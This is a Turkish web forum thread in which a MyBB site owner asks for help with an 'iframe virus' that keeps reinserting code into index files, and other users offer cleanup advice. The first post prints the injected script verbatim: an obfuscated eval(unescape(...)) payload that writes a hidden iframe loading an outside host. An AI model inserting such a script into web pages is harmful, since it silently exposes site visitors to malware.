Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 655
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Formlarda yazılanlar ekra..
(4030 okuma, 0 yanıt)
 MyBB 1.2 Kurulum(Resimli ..
(6440 okuma, 1 yanıt)
 mybb kurulum hatası..
(5515 okuma, 1 yanıt)
 Mybb -> BBtonuke Dönüş..
(5115 okuma, 1 yanıt)
 bu sorun cikariyor bana..
(5543 okuma, 2 yanıt)
 MyBB Son Sürüm..
(9282 okuma, 6 yanıt)
 MYBB Seo l Site Maps l Me..
(6916 okuma, 4 yanıt)
 MyBB 1.4 Forum Türkçe Yam..
(8148 okuma, 5 yanıt)
 Cracker Tracker 1.07{MyBB..
(6659 okuma, 2 yanıt)
 PHP Nukeye Mybb Entegre E..
(18416 okuma, 18 yanıt)
 Mybb Kurulumu..
(4353 okuma, 0 yanıt)
 MyBB 1.4.1 Tam Türkçe Kur..
(4637 okuma, 0 yanıt)
 mybb forumum google seo l..
(5285 okuma, 1 yanıt)
 Php Nukeye Mybb Entegresi..
(8711 okuma, 6 yanıt)
 overview linkleri yeni sa..
(4701 okuma, 0 yanıt)
 mybb siteyi sol tarafa ya..
(4654 okuma, 0 yanıt)
 Postbit Menü MybbTurkiye ..
(6318 okuma, 1 yanıt)
 MyBB hata Türkçe Karakter..
(4678 okuma, 0 yanıt)
 Mybb Super Flv Player Myc..
(4848 okuma, 0 yanıt)
 Youtube MyKod (Plugin&..
(9693 okuma, 8 yanıt)
 mybb database sorunu..
(5206 okuma, 0 yanıt)
 lycos ta mybb kurdum ufak..
(5651 okuma, 1 yanıt)
 iframe virüsü kurtuluşu ?..
(10775 okuma, 8 yanıt)
 .htaccess yazabilcek arka..
(4542 okuma, 0 yanıt)
 Mk Portal'ın MyBB'ye Kuru..
(6391 okuma, 1 yanıt)
 MyBB-Wodrpress Entegresi..
(8810 okuma, 5 yanıt)
 YBFrss Otomatik Sitemap(l..
(8921 okuma, 5 yanıt)
 Anasayfada Son Konu yazar..
(4895 okuma, 0 yanıt)
 MyBB SEO 1.0 Beta 9..
(4566 okuma, 0 yanıt)
 Hoşgeldiniz Paneli..
(5032 okuma, 0 yanıt)
 Overview 3.0.4..
(4958 okuma, 0 yanıt)
 Forumların Başına İcon Ek..
(5535 okuma, 0 yanıt)
 Hızlı Kayıt Ol Eklentisi..
(4742 okuma, 0 yanıt)
 SeoArsiv Mod..
(4905 okuma, 0 yanıt)
 MyBB Güvenliğini Arttıral..
(6662 okuma, 2 yanıt)
 Sitenize Duyuru Panosu..
(6931 okuma, 2 yanıt)
 php-nuke'den myBB'ye..
(15540 okuma, 16 yanıt)
 mybb forum admin paneline..
(6310 okuma, 1 yanıt)
 YBf Artık Mybb Olarak Onl..
(9447 okuma, 7 yanıt)
 aktivasyon linki ve alt f..
(6262 okuma, 2 yanıt)
 Sitede üye olunamıyor !..
(10592 okuma, 7 yanıt)
 mybbde tema ve dil yükle..
(7024 okuma, 3 yanıt)
 Hide Hack 1.2..
(6558 okuma, 2 yanıt)
 CGC AyYıldız Teması V4..
(8428 okuma, 3 yanıt)
 myBB Türkçe 1.2x Çeviri 3..
(5962 okuma, 1 yanıt)
 EfixClub TRed Theme..
(5959 okuma, 1 yanıt)
 1.20 Moderatör Bloğu &..
(7787 okuma, 3 yanıt)
 Fenerbahçe Teması[MyBB 1...
(14372 okuma, 12 yanıt)
 MyBB 1.2.1 Güvenlik Günce..
(8049 okuma, 4 yanıt)
 MyBB MTR Paket v4..
(5591 okuma, 1 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - i f r a m e virüsü kurtuluşu ?
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


i f r a m e virüsü kurtuluşu ?

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> MyBB Forumu
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-02, 17:16:41    Mesaj konusu: i f r a m e virüsü kurtuluşu ? Alıntıyla Cevap Gönder

merhabalar

ikidebir siteme böle kod ekleniyor. avaba kendi kendinemi ekliyo. birisimi ekliyo. bıktım düzeltmekten.
Forumum mybb
admin/index.php dosyasına ce
index.php
dosyalarına ekleniyor. site curcuna gözüküor. o zaman. bozuk şeklinde oluyor.

Kod:
echo "<body id=\"logo\"><script>e v a l(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%6 5%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%63%32% 31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%74%6f%6d%61%6b%61%79%61%6e%2e%62 %69%7a%2f%69%6e%64%65%78%2e%70%68%70%3f%6f%75%74%3d%31%31%39%30%32%33%38%37%33%3 2%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28% 29%2a%32%32%33%34%34%36%29%2b%27%35%65%37%33%31%39%5c%27%20%77%69%64%74%68%3d%36 %36%39%20%68%65%69%67%68%74%3d%33%33%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>\n";


En son mechulsun tarafından 2007-10-05, 03:50:16 tarihinde değiştirildi, toplam 1 kere değiştirildi
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-03-28, 14:31:05    Mesaj konusu: Forum Arası Reklamlar


Başa dön
nofel
Mesaj: 500+
Mesaj: 500+





Kayıt: Apr 25, 2005
Mesajlar: 655

MesajTarih: 2007-10-02, 19:43:02    Mesaj konusu: Alıntıyla Cevap Gönder

bu sitelere bulaşan i f r a m e virüsü olmasın sakın Very Happy

dikkatli olmak lazım Very Happy

kurtul bi an önce derim Very Happy
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-03, 08:22:28    Mesaj konusu: Alıntıyla Cevap Gönder

ya ben dosyanın yenisini atıyorum. yine bulaşıyo. mybbnin bütün dosyalarına attım. düzeliyor. sonra ine böle oluyo.
ve sitemi indirdim. tarama yaptırdım hiçbişey yok ama hala bu kod ekleniyo oraya delirdim artık Sad(((8
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
durdu
Mesaj: 50+
Mesaj: 50+





Kayıt: Jun 19, 2006
Mesajlar: 82
Konum: Giresun/Ordu.arasi

MesajTarih: 2007-10-03, 14:11:43    Mesaj konusu: Alıntıyla Cevap Gönder

off off kardeş o sorun bendede var .sorunu cöze bilirsen buraya yaz bizde bilgirenek

20 gündür uğlaşim Sad
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-05, 03:48:45    Mesaj konusu: Re: bu kod ne oluyor Alıntıyla Cevap Gönder

Arkadaşlar Ben Sorunu Buldum. Bulaşanlara Bilgi Amaçlı olsun diye Yardımcı olayım.

Bu Kod İframe Virüsü oluyormuş. O Virüs pcden ftp programı yoluyla ulaşmıştır.... Bütün İndex.php veya İndex.html Dosyalarına Yerleşmektedir. Yapmamız Gereken ise o virüslü kodu siliniz. Yenisi Varsa Upload ediniz...

Sonra Pcye Format atınız bence.
Format atar atmaz ftp şifresini değiştiriniz...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
PhP_CoDeR
Mesaj: 200+
Mesaj: 200+





Kayıt: Oct 28, 2003
Mesajlar: 299

MesajTarih: 2007-10-05, 07:39:02    Mesaj konusu: Alıntıyla Cevap Gönder

1- Sadece indexlere bulaşmıyor,
2- Index yada bulaştığı dosyayı değiştirmek çözüm değil,
3- PC ye format atmak da önemli değil,
4- FTP Şifresi de sorun olmaz...

Daha önce bu konuda epey bilgi vermiştim... Geçmiş mesajlara bakarsanız, daha detaylı bilgilere ulaşabilirsiniz.


http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32224&highlight=

http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32671&highlight=
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2007-10-05, 10:17:59    Mesaj konusu: Alıntıyla Cevap Gönder

PhP_CoDeR :
1- Sadece indexlere bulaşmıyor,
2- Index yada bulaştığı dosyayı değiştirmek çözüm değil,
3- PC ye format atmak da önemli değil,
4- FTP Şifresi de sorun olmaz...

Daha önce bu konuda epey bilgi vermiştim... Geçmiş mesajlara bakarsanız, daha detaylı bilgilere ulaşabilirsiniz.


http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32224&highlight=

http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32671&highlight=


gelişimi...
1. sitenizde açık bulunan bir modül aracılığı ile sitenize .dosya.php .dosya.html gibi bir dosya atıyor bu dosya bir çeşit ftp aracı özelliği taşıyor...
2. yüklenen dosya ile dilediği yere yazdırıp çizdirip değer değiştirip yenilikler yapılabiliyor...
3. bunu yemişseniz ne yaparsanız yapın kurtuluşunuz yok...

çözüm...

1. şüphelendiğiniz modülleri siliniz
2. kodu yiyen dosyaları yenileri ile değiştirip ftp şifrenizi değiştiriniz...
3. şüpheli modüller sırası ile: fıkra, şiir, My_eGallery, coppermine, Köşe_Yazıları (alt sürümleri 4.3-2 alt sürümleri) Card, Site_Messenger 1.4 den alt sürümleri, son olarak shoutbox 8.5 alt sürümleri...

Not: youtube ve benzeri modüller bu kategori içinde yer alabilirler...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
PhP_CoDeR
Mesaj: 200+
Mesaj: 200+





Kayıt: Oct 28, 2003
Mesajlar: 299

MesajTarih: 2007-10-05, 13:43:31    Mesaj konusu: Alıntıyla Cevap Gönder

Bunun tek çaresi ya virüsü bulup sileceksiniz ki virüsü ayırt etmek bayağı bir zor. Genellikle cpanel kullanan kişilerde mail klasörüne yerleşiyor. mail klasörünü komple bilgisayarınıza indirin nortonun en güncel hali ile tarayın size tavsiyem... Eğer virüsü bulursa, hangi klasörde olduğuna bakın, ftp den o dosyayı silin. Virüs temizlenmiş olacaktır. Defalarca bu yöntemle birçok kişiyi virüsten kurtardım.

İkincisi ise, virüsü bulamadığınız takdirde, tek çareniz hostu silmeniz ve tekrar oluşturmanız. Bunun için tüm yedeklerinizi alın, host yetkilisine hesabınızı silip tekrar oluşturmasını iletin. Yeni hesabınız oluşturulduğunda tüm dosyalarınızı (tabi tekrar antivirüs ile taramanızda fayda var...) siteye yükleyin. Bunu da deneyen arkadaşlarım olumlu sonuç aldılar.

Not: Unutmayın ki eklediği kodları silmek asla kalıcı çözüm değildir. Virüsü siteden atmadıkça o her zaman zararlarını gösterecektir.

Kolay gelsin...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-03-28, 14:31:05    Mesaj konusu: Forum Arası Reklamlar


Başa dön
ultrAslanYavuz
Tema Sorumlusu
Tema Sorumlusu





Kayıt: Jun 25, 2006
Mesajlar: 1217

MesajTarih: 2007-10-05, 13:50:36    Mesaj konusu: Alıntıyla Cevap Gönder

codere katılıyorum. benim basıma gelmişti.mail klasöründeydi virüs ve silinmiyordu.yedekelri aldım ve hostu sıfırlattırdım. sonra tekrar siteyi attım sorun yok.bu arada şifreleri değişmede fayda var.ben ftp yi bi arkadaşımla beraber kullanıyordum.o diyordu benim bilgisayarda virüs olmaz vs. en sonunda dedim kaspersky in son sürümünü indir ve bilgisayarı virüs dolu cıktı.yani anlayacagınız hatayı illaki kendinizde aramayınız.en iyi yol bence yedeklerinizi alın virüsten ayırın daha sonraşifrenizi değiştirin ve tekrar atın.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> MyBB Forumu Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Foruma iframe Kodları Calısmıyor cuneytsonmez NukeBB Eklentileri 4 2010-05-22, 00:49:02 Son Mesajı Görüntüle
Yeni mesaj yok Forumda iframe kullanmak Vizyon Php Nuke Sorunlarınız 4 2010-01-03, 19:44:43 Son Mesajı Görüntüle
Yeni mesaj yok Iframe de download sorunu AndersNystrom Php Nuke Sorunlarınız 0 2009-09-29, 16:38:15 Son Mesajı Görüntüle
Yeni mesaj yok Block iframe canpolat03 Php Nuke Sorunlarınız 3 2009-09-20, 22:24:53 Son Mesajı Görüntüle
Yeni mesaj yok IFRAME Virüs Nasıl Bulaşır? denizcifcii Php Nuke Sorunlarınız 3 2009-09-14, 15:00:47 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright